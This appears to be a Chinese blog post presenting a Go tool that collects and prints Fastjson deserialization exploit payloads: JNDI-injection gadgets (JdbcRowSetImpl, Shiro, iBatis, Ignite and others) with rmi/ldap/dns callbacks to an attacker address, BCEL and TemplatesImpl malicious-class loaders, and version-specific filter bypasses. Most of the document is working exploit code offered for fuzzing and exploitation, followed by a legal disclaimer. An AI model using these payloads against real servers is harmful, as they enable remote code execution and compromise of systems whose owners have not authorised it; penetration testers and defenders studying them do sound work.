Fastjson反序列化漏洞4:payload收集

What

无第三方依赖
收集了网络上的多种payload,方便进行fuzz测试
提供了自动替换payload的功能,一次性为所有payload插入rmi地址/dnslog

Help

--list:以清单的形式打印,方便作为字典进行fuzz

--address:服务器地址(无需 rmi:// 或 ldap:// 协议前缀),如 11.22.33.44/exp、eval.com/rce

--dns:dnslog的地址,不同payload会添加不同的子域名,方便查看是哪一条payload

--code:加载恶意类的code,需要自行添加$$BCEL$$的开头

Example

FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com
image

FjsonShowPload.exe --address hackserver.com --dns dnslog.com
image

注意:重定向到文件后,需要手动去掉开头的 banner 和结尾的 "Your input" 确认信息,或者直接在代码中去除这两处输出

How

将代码保存为 FjsonSoPload.go

进入命令行窗口:go build ./

即可得到一个 FjsonSoPload.exe

Code

package main

import (
	"flag"
	"fmt"
)

// Package-level state shared by main, the Show_*/Bypass_* emitters and
// ShowPayload. The flag values are filled in once by main and then only read;
// Pal/Hep/Vson hold whatever entry was last handed to ShowPayload.
var (
	id = 1     // running PayloadID printed in detail mode; ShowPayload increments it
	dt = false // "show detail": main sets it to !list, so it is true unless --list is given
	cl = true  // declared but never read in this file

	code    string // --code: value spliced into the BCEL / TemplatesImpl entries
	Address string // --address: host[/path] spliced after rmi:// or ldap://
	dnslog  string // --dns: domain that the dns:// entries prefix with a per-entry label

	Pal, Hep, Vson string // payload, note and version text of the current entry
)

// main prints the banner, parses the command-line flags into the package-level
// settings and then walks every group of the collection in a fixed order,
// printing each entry through ShowPayload. --list turns the boxed explanation
// off (dt becomes false) so the output can be used as a plain wordlist; the
// "Your input" trailer is still printed on exit in both modes, which is why the
// author's note about trimming the banner and the trailer applies to redirected
// output.
func main() {
	fmt.Println(" ████████  ██                            ████████ ██                          ███████   ██                         ██\n░██░░░░░  ░░                            ██░░░░░░ ░██                         ░██░░░░██ ░██                        ░██\n░██        ██  ██████  ██████  ███████ ░██       ░██       ██████  ███     ██░██   ░██ ░██  ██████   ██████       ░██\n░███████  ░██ ██░░░░  ██░░░░██░░██░░░██░█████████░██████  ██░░░░██░░██  █ ░██░███████  ░██ ██░░░░██ ░░░░░░██   ██████\n░██░░░░   ░██░░█████ ░██   ░██ ░██  ░██░░░░░░░░██░██░░░██░██   ░██ ░██ ███░██░██░░░░   ░██░██   ░██  ███████  ██░░░██\n░██     ██░██ ░░░░░██░██   ░██ ░██  ░██       ░██░██  ░██░██   ░██ ░████░████░██       ░██░██   ░██ ██░░░░██ ░██  ░██\n░██    ░░███  ██████ ░░██████  ███  ░██ ████████ ░██  ░██░░██████  ███░ ░░░██░██       ███░░██████ ░░████████░░██████\n░░      ░░░  ░░░░░░   ░░░░░░  ░░░   ░░ ░░░░░░░░  ░░   ░░  ░░░░░░  ░░░    ░░░ ░░       ░░░  ░░░░░░   ░░░░░░░░  ░░░░░░ \n")

	// Flags are bound straight to the package-level variables the emitters read.
	var list bool
	flag.BoolVar(&list, "list", false, "不展示payload细节与利用方式(默认展示)")
	flag.StringVar(&code, "code", "恶意code", "恶意code,自行添加$$BCEL$$开头")
	flag.StringVar(&dnslog, "dns", "default.com", "dnslog")
	flag.StringVar(&Address, "address", "127.0.0.1/exp", "rmi/ldap地址(无需带协议名)")
	flag.Parse()

	// The flag is named "list" but the global it drives means "show detail".
	dt = !list
	defer fmt.Println("\nYour input :", dnslog, " | ", Address)

	// Emission order is the order of the collection; PayloadIDs depend on it.
	Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() // BasicDataSource + BCEL ClassLoader, both tomcat-dbcp package names
	Show_com_sun_rowset_JdbcRowSetImpl()               // JdbcRowSetImpl, plain class name
	Bypass25_41_com_sun_rowset_JdbcRowSetImpl()        // same class wrapped as L...;
	Bypass41_42_com_sun_rowset_JdbcRowSetImpl()        // same class wrapped as LL...;;
	Bypass25_41_BasicDataSource()                      // BasicDataSource wrapped as L...;
	other()                                            // remaining gadgets, including the java.lang.Class cache variant
}

// Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource emits the two BasicDataSource
// entries of the collection, one per tomcat-dbcp package name (dbcp and dbcp2).
// Both splice the --code value into driverClassName; the author's note marks
// them as needing no outbound connection. Pal/Hep/Vson are updated per entry,
// as in every emitter.
func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {
	emit := func(payload, note, versions string) {
		Pal, Hep, Vson = payload, note, versions
		ShowPayload(Pal, Hep, Vson)
	}
	const (
		note   = `BCEL加载恶意code的利用链,正连加载恶意code,无需出网`
		middle = `.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"`
	)
	emit(`{"@type":"org.apache.tomcat.dbcp.dbcp`+middle+code+`"}`, note, `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`)
	emit(`{"@type":"org.apache.tomcat.dbcp.dbcp2`+middle+code+`"}`, note, `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`)
}

// Show_com_sun_rowset_JdbcRowSetImpl emits the three JdbcRowSetImpl entries
// (plain class name): rmi:// and ldap:// built from Address, and a dns:// form
// built from the poc1 label on dnslog so a lookup identifies this entry.
func Show_com_sun_rowset_JdbcRowSetImpl() {
	emit := func(payload, note, versions string) {
		Pal, Hep, Vson = payload, note, versions
		ShowPayload(Pal, Hep, Vson)
	}
	const (
		prefix = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"`
		suffix = `","autoCommit":true}`
		ver    = `Fastjson <= 1.2.24`
	)
	emit(prefix+`rmi://`+Address+suffix, `JNDI注入-RMI利用链exp,反连`, ver)
	emit(prefix+`ldap://`+Address+suffix, `JNDI注入-ldap利用链exp,反连`, ver)
	emit(prefix+`dns://poc1.`+dnslog+suffix, `JNDI注入-DNSlog利用链poc,请求dnslog`, ver)
}

// Bypass25_41_BasicDataSource emits the single dbcp2 BasicDataSource entry whose
// class names are written in the L...; descriptor form; --code is spliced into
// driverClassName. An identical payload is emitted again from other() under the
// "未知" version tag.
func Bypass25_41_BasicDataSource() {
	payload := `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Pal, Hep, Vson = payload, `BCEL利用链exp,正连,类名前后加L与;进行绕过`, `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)
}

// other emits the remainder of the collection: the gadget classes the author
// gathered for Fastjson 1.2.24 through 1.2.68 plus a few tagged "未知" (version
// unknown). Most JNDI-style entries come in threes — an rmi:// and an ldap://
// form built from Address, and a dns:// form built from a per-entry label on
// dnslog so a DNS lookup identifies which entry fired. The trailing
// BasicDataSource and TemplatesImpl entries take the --code value instead.
// All strings are reproduced byte-for-byte from the author's collection,
// including the JndiObjectFactory group whose scheme/host pairing differs
// from the others. Emission order determines the PayloadID numbering.
func other() {
	emit := func(payload, note, versions string) {
		Pal, Hep, Vson = payload, note, versions
		ShowPayload(Pal, Hep, Vson)
	}
	// triple emits the usual rmi/ldap/dns trio for one gadget; sub is the
	// dnslog label, note applies to the rmi and ldap forms, dnsNote to the dns form.
	triple := func(prefix, suffix, sub, note, dnsNote, versions string) {
		emit(prefix+`rmi://`+Address+suffix, note, versions)
		emit(prefix+`ldap://`+Address+suffix, note, versions)
		emit(prefix+`dns://`+sub+`.`+dnslog+suffix, dnsNote, versions)
	}
	const (
		jndi    = `JNDI注入`
		jndiExp = `JNDI注入-exp`
		jndiDNS = `JNDI注入-dnslog`
		unknown = `未知`
	)

	// JdbcRowSetImpl with the key and class name written as \u escapes (raw
	// strings, so the backslashes reach the JSON unchanged); <= 1.2.24.
	triple(`{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"`,
		`","autoCommit":true}}`, `ubm`, jndi, jndiDNS, `Fastjson <= 1.2.24`)

	// The L...; and LL...;; spellings of JdbcRowSetImpl are emitted by the two
	// Bypass*_com_sun_rowset_JdbcRowSetImpl functions; this is the "[" form, <= 1.2.43.
	triple(`{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"`,
		`","autoCommit":true}`, `mik`, jndiExp, jndiDNS, `Fastjson<=1.2.43`)

	// MyBatis JndiDataSourceFactory, <= 1.2.45.
	triple(`{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"`,
		`"}}`, `jds`, jndiExp, jndiDNS, `Fastjson<=1.2.45`)

	// java.lang.Class cache variant of JdbcRowSetImpl, <= 1.2.47. The author's
	// dns note reads "dnsliog" and is kept as published.
	triple(`{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"`,
		`","autoCommit":true}}`, `dbjn`, jndiExp, `dnsliog`, `Fastjson<=1.2.47`)

	// xbean JndiConverter, <= 1.2.62 (the author cites CVE-2020-8840).
	triple(`{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"`,
		`"}`, `cben`, jndiExp, jndiDNS, `Fastjson<=1.2.62`)

	// Ignite CacheJndiTmLookup, <= 1.2.66.
	triple(`{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"`,
		`"}`, `igjt`, jndiExp, jndiDNS, `Fastjson<=1.2.66`)

	// Anteros DBCP config, metricRegistry property, <= 1.2.66.
	triple(`{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"`,
		`"}`, `atbc`, jndiExp, jndiDNS, `Fastjson<=1.2.66`)

	// iBatis JtaTransactionConfig (note the space after "properties":), <= 1.2.66.
	triple(`{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"`,
		`"}}`, `eget`, jndiExp, jndiDNS, `Fastjson<=1.2.66`)

	// Anteros DBCP config, healthCheckRegistry property, <= 1.2.67.
	triple(`{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"`,
		`"}`, `antr`, jndiExp, `dnslog`, `Fastjson<=1.2.67`)

	// Shiro JndiRealmFactory, <= 1.2.67.
	triple(`{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["`,
		`"],"Realms":[""]}`, `siro`, jndiExp, jndiDNS, `Fastjson<=1.2.67`)

	// Resin ResourceRef, <= 1.2.67.
	triple(`{"@type":"com.caucho.config.types.ResourceRef","lookupName":"`,
		`"}`, `caco`, jndiExp, jndiDNS, `Fastjson<=1.2.67`)

	// iBatis JtaTransactionConfig again, without the space, <= 1.2.67.
	triple(`{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"`,
		`"}}`, `jti`, jndiExp, jndiDNS, `Fastjson<=1.2.67`)

	// Shiro JndiObjectFactory, <= 1.2.68. Kept exactly as the author wrote it:
	// the first form uses dns:// with Address and the third rmi:// with dnslog.
	{
		const (
			prefix = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"`
			suffix = `"}`
			ver    = `Fastjson<=1.2.68`
		)
		emit(prefix+`dns://`+Address+suffix, jndiExp, ver)
		emit(prefix+`ldap://`+Address+suffix, jndiExp, ver)
		emit(prefix+`rmi://w9.`+dnslog+suffix, jndiDNS, ver)
	}

	// Hadoop-shaded HikariConfig, <= 1.2.68.
	triple(`{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"`,
		`"}`, `ppx`, jndiExp, jndiDNS, `Fastjson<=1.2.68`)

	// Commons Configuration JNDIConfiguration, version unknown.
	triple(`{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"`,
		`"}`, `cons`, `jndi`, `dnslog`, unknown)

	// OpenJPA RegistryManagedRuntime, version unknown.
	triple(`{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"`,
		`","rollbackOnly":null}`, `openjpa`, `jndi`, `dnslog`, unknown)

	// dbcp2 BasicDataSource in L...; form with --code; duplicates the entry
	// emitted by Bypass25_41_BasicDataSource under a different version tag.
	emit(`{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "`+code+`"}`,
		`bcel`, unknown)

	// TemplatesImpl, JDK-internal and Xalan package names, --code in _bytecodes.
	const templatesTail = `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	emit(`{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["`+code+templatesTail,
		`加载恶意类`, unknown)
	emit(`{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["`+code+templatesTail,
		`加载恶意类`, unknown)
}

// Bypass25_41_com_sun_rowset_JdbcRowSetImpl emits the JdbcRowSetImpl trio with
// the class name written in L...; descriptor form: rmi:// and ldap:// from
// Address, dns:// from the poc2 label on dnslog. The author tags all three as
// Fastjson < 1.2.41.
func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {
	emit := func(payload, note, versions string) {
		Pal, Hep, Vson = payload, note, versions
		ShowPayload(Pal, Hep, Vson)
	}
	const (
		prefix = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"`
		suffix = `","autoCommit":true}`
		ver    = `Fastjson < 1.2.41`
	)
	emit(prefix+`rmi://`+Address+suffix, `JNDI注入-RMI利用链exp,反连,类名前后加L与;进行绕过`, ver)
	emit(prefix+`ldap://`+Address+suffix, `JNDI注入-ldap利用链exp,反连,类名前后加L与;进行绕过`, ver)
	emit(prefix+`dns://poc2.`+dnslog+suffix, `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后加L与;进行绕过`, ver)
}

// Bypass41_42_com_sun_rowset_JdbcRowSetImpl emits the JdbcRowSetImpl trio with
// the L and ; of the descriptor form doubled (LL...;;). The dns:// form reuses
// the poc2 label, so it is not distinguishable from the Bypass25_41 entry by
// subdomain alone. The first version string carries a leading space exactly as
// the author wrote it.
func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {
	emit := func(payload, note, versions string) {
		Pal, Hep, Vson = payload, note, versions
		ShowPayload(Pal, Hep, Vson)
	}
	const (
		prefix = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"`
		suffix = `","autoCommit":true}`
		ver    = `1.2.41 <= Fastjson < 1.2.42`
	)
	emit(prefix+`rmi://`+Address+suffix, `JNDI注入-RMI利用链exp,反连,类名前后双写L与;进行绕过`, ` `+ver)
	emit(prefix+`ldap://`+Address+suffix, `JNDI注入-ldap利用链exp,反连,类名前后双写L与;进行绕过`, ver)
	emit(prefix+`dns://poc2.`+dnslog+suffix, `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后双写L与;进行绕过`, ver)
}

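// ShowPayload prints one collection entry to stdout. str[0] is the payload
// text, str[1] the author's note and str[2] the version range the author says
// it was checked against; every caller in this file passes all three.
//
// With dt false (--list was given) only the payload line is printed, so the
// output can be consumed as a plain wordlist. With dt true the entry is boxed:
// a header carrying the running PayloadID (id is a package-level counter
// incremented here), the payload wrapped in ANSI red, the note, the version
// block with the author's "for reference only" caveat, and a closing line.
// The output is byte-identical to the earlier three-branch version; the
// closing line used to be a defer and is now printed last explicitly. A
// missing trailing argument prints as an empty string instead of panicking.
func ShowPayload(str ...string) {
	const redColor = "\033[31m"
	const resetColor = "\033[0m"

	// field returns str[i], or "" when fewer arguments were supplied.
	field := func(i int) string {
		if i < len(str) {
			return str[i]
		}
		return ""
	}

	if !dt {
		fmt.Println(field(0))
		return
	}

	fmt.Println("┌─────────PayloadID:", id)
	id++
	fmt.Printf("%s%s%s\n", redColor, field(0), resetColor)

	fmt.Println("│\n├───[+]payload说明:")
	fmt.Print("│\t")
	fmt.Println(field(1))

	fmt.Println("│\n├───[+]验证过的版本:")
	fmt.Print("│\t")
	fmt.Println(field(2))
	fmt.Println("│\t注:版本号仅供参考                                        Fastjson SEC──┐")
	// Print with an explicit double newline rather than Println("...\n"),
	// which go vet flags as a redundant newline; the bytes emitted are the same.
	fmt.Print("└──────────────────────────────────────────────────────────────────────────────┘\n\n")
}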

Thanks

Java中Fastjson各版本漏洞对抗史与总结 - 先知社区 (aliyun.com)

最全fastjson漏洞复现与绕过-腾讯云开发者社区-腾讯云 (tencent.com)

Java反序列化之FastJson反序列化及绕过 - 先知社区 (aliyun.com)

c0ny1/FastjsonExploit(fastjson漏洞快速利用框架) (github.com)

smallfox233/JsonExp: fastjson漏洞批量检测工具 (github.com)


相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。

